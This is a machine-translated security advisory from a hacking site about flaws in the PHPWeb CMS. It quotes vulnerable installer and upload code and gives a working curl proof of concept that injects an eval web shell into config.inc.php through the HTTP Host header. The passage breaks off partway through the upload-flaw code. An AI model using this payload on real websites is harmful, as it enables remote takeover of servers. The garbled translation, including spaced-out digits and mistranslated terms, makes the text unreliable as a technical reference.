phpweb finished website to the latest version(inject, upload, write the shell)-vulnerability warning-the black bar safety net

2013-01-04T00:00:00
ID MYHACK58:62201336563
Type myhack58
Reporter 佚名
Modified 2013-01-04T00:00:00

Description

Injection:

The reason chicken is the exploit installing the file to re-generate the configuration file write executable code

Chicken 1: the destructive action of a very large re-write the configuration file the database connection file

Tasteless 2: There is some Safety common sense of the webmasters will delete the install directory

Although tasteless, but there are also advantages: not affected by magic_quotes_gpc, the webserver impact

Analysis:

$siteurl="http://".$ _SERVER["HTTP_HOST"]."/"; //Not filtered

$filestr = fread(fopen($SysConfigFile, 'r'),3 0 0 0 0);

$filestr=str_replace(" ","",$filestr);

$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);

$filestr=str_replace("DefaultDbName",$dbname,$filestr);

$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);

$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);

$filestr=str_replace("DefaultsLan","EN",$filestr);

$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);

$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

fwrite(fopen($ConFile,"w"),$filestr,3 0 0 0 0);

$_SERVER["HTTP_HOST"] is the http head in the HOST to pass over control,and is not affected by the magic_quotes_gpc effects ^ _ ^

poc: the

?

1

curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

shell address: /config.inc.php

With before phpcms like the need to the remote database


Upload vulnerability(need feed back) of:

Vulnerability file: /kedit/upload_cgi/upload.php

This many people know,but very tasteless iis6 analytical or GPC off conditions before they can be used

<? php

define("ROOTPATH", "../../");

include(ROOTPATH."includes/admin.inc.php");

NeedAuth(0);

$dt=date("Ymd",time());

if(! is_dir(ROOTPATH.$ _POST['attachPath'].$ dt)){

@mkdir(ROOTPATH.$ _POST['attachPath'].$ dt,0 7 7 7);

}

//File to save the directory path

$save_path = ROOTPATH.$ _POST['attachPath'].$ dt.'/';

echo $save_path;

//File to save the directory URLS

$save_url = '../../'.$ _POST['attachPath'].$ dt.'/';

//Define the allowed Upload file extension

$ext_arr = array('gif','jpg','png','bmp'); //limit suffix

//Maximum file size

$max_size = 1 0 0 0 0 0 0;

//Change directory permissions

@mkdir($save_path, 0 7 7 7);

//File full path

$file_path = $save_path.$ _POST['fileName']; //save file name

//File URL

$file_url = $save_url.$ _POST['fileName'];

[1] [2] next